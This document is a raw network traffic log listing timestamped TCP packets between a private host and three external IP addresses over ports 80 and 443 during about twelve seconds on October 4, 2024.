Oct 4, 2024 19:18:05.187666893 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.188215971 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.188286066 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.188543081 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.188607931 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.189300060 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.189364910 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.189455032 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.189519882 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.190195084 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.190267086 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.263494015 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.263714075 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.277823925 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.278053999 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.278096914 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.278170109 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.278232098 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.278232098 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.278232098 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.278232098 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.278330088 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.278352022 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.278374910 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.278383017 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.341279030 CEST	49798	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:05.349407911 CEST	80	49798	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:05.349517107 CEST	49798	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:05.349643946 CEST	49798	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:05.349643946 CEST	49798	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:05.356786013 CEST	80	49798	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:05.356858969 CEST	80	49798	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:06.618854046 CEST	80	49798	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:06.619213104 CEST	80	49798	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:06.619405985 CEST	49798	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:06.625612974 CEST	49798	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:06.633434057 CEST	80	49798	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:06.764621973 CEST	49804	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:06.769506931 CEST	80	49804	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:06.769591093 CEST	49804	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:06.770210028 CEST	49804	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:06.770246029 CEST	49804	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:06.775217056 CEST	80	49804	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:06.775269985 CEST	80	49804	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:08.103205919 CEST	80	49804	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:08.108028889 CEST	80	49804	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:08.108093977 CEST	49804	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:08.108153105 CEST	49804	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:08.116925955 CEST	49815	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:08.118585110 CEST	80	49804	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:08.127613068 CEST	80	49815	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:08.127681017 CEST	49815	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:08.127762079 CEST	49815	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:08.127770901 CEST	49815	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:08.137919903 CEST	80	49815	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:08.139348984 CEST	80	49815	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:09.566529989 CEST	80	49815	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:09.566544056 CEST	80	49815	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:09.566559076 CEST	80	49815	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:09.566597939 CEST	49815	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:09.566597939 CEST	49815	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:09.575726032 CEST	49815	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:09.584400892 CEST	80	49815	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:09.704323053 CEST	49819	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:09.709822893 CEST	80	49819	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:09.709917068 CEST	49819	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:09.710045099 CEST	49819	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:09.710074902 CEST	49819	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:09.715454102 CEST	80	49819	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:09.715483904 CEST	80	49819	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:11.147438049 CEST	80	49819	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:11.147826910 CEST	80	49819	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:11.147907972 CEST	49819	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:11.147983074 CEST	49819	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:11.151911020 CEST	49826	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:11.153148890 CEST	80	49819	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:11.157576084 CEST	80	49826	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:11.157660007 CEST	49826	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:11.157788992 CEST	49826	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:11.157804966 CEST	49826	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:11.163198948 CEST	80	49826	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:11.163449049 CEST	80	49826	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:12.412683010 CEST	80	49826	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:12.412887096 CEST	80	49826	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:12.412955999 CEST	49826	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:12.416838884 CEST	49826	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:12.421668053 CEST	80	49826	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:12.435086012 CEST	49833	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:12.443198919 CEST	80	49833	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:12.443276882 CEST	49833	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:12.443442106 CEST	49833	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:12.443476915 CEST	49833	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:12.448821068 CEST	80	49833	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:12.448831081 CEST	80	49833	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:13.846260071 CEST	80	49833	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:13.846278906 CEST	80	49833	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:13.846347094 CEST	49833	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:13.846580029 CEST	49833	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:13.853351116 CEST	80	49833	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:13.859740973 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:13.859792948 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:13.859865904 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:13.860198021 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:13.860228062 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:15.569466114 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:15.569555044 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:15.572182894 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:15.572212934 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:15.572635889 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:15.577430964 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:15.619405031 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.545507908 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.545586109 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.545629978 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.545676947 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.545736074 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.545772076 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.545794964 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.547481060 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.547535896 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.547564030 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.547579050 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.547609091 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.547626972 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.634411097 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.634460926 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.634535074 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.634562016 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.634592056 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.634615898 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.636482000 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.636522055 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.636574030 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.636585951 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.636614084 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.636634111 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.638004065 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.638047934 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.638091087 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.638103008 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.638129950 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.638154030 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.639404058 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.639445066 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.639487982 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.639501095 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.639527082 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.639553070 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.724065065 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.724102974 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.724149942 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.724164009 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.724189043 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.724210024 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.724647045 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.724704981 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.724714041 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.724740028 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.724766970 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.725877047 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.725897074 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.725946903 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.725961924 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.725986958 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.727121115 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.727139950 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.727185011 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.727207899 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.727232933 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.729250908 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.729269028 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.729315042 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.729329109 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.729357958 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.730741978 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.730762005 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.730812073 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.730829000 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.730879068 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.812184095 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.812233925 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.812297106 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.812316895 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.812342882 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.812372923 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.813523054 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.813565016 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.813602924 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.813616037 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.813642979 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.813672066 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.813898087 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.813973904 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.813987017 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.814846039 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.814883947 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.814934015 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.814948082 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.814974070 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.818470001 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.818509102 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.818542957 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.818557978 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.818584919 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.819421053 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.819458961 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.819490910 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.819509983 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.819533110 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.819533110 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.820288897 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.820327044 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.820367098 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.820380926 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.820425987 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.820715904 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.820755005 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.820789099 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.820807934 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.820830107 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.866883039 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.903187990 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.903263092 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.903460979 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.903476954 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.903631926 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.903852940 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.903873920 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.903940916 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.903954983 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.904006958 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.905040979 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.905062914 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.905103922 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.905117035 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.905142069 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.905164003 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.906219006 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.906239986 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.906297922 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.906311989 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.906363010 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.907094955 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.907114983 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.907157898 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.907171965 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.907196045 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.907218933 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.907705069 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.907727003 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.907782078 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.907795906 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.907847881 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.909317017 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.909337044 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.909393072 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.909405947 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.909459114 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.910423994 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.910444021 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.910487890 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.910500050 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.910525084 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.910546064 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.994626045 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.994707108 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.994812965 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.994853020 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.994949102 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.994950056 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.994966984 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.995011091 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.995739937 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.995784044 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.995826960 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.995841980 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.995867014 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.996407986 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.996448040 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.996480942 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.996500015 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.996522903 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.997057915 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.997098923 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.997147083 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.997162104 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.997189999 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.998044968 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.998085022 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.998117924 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.998131990 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.998158932 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.998889923 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.998934984 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.998960018 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:16.998974085 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:16.999000072 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.000207901 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.000260115 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.000300884 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.000314951 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.000339985 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.054426908 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.083053112 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.083108902 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.083192110 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.083208084 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.083254099 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.083273888 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.083964109 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.083983898 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.084180117 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.084193945 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.084259987 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.085464001 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.085484028 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.085540056 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.085551977 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.085593939 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.085612059 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.086632967 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.086652040 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.086720943 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.086735010 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.086786032 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.087308884 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.087327003 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.087399960 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.087414980 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.087471962 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.088314056 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.088334084 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.088392973 CEST	49843	443	192.168.2.4	217.197.91.145
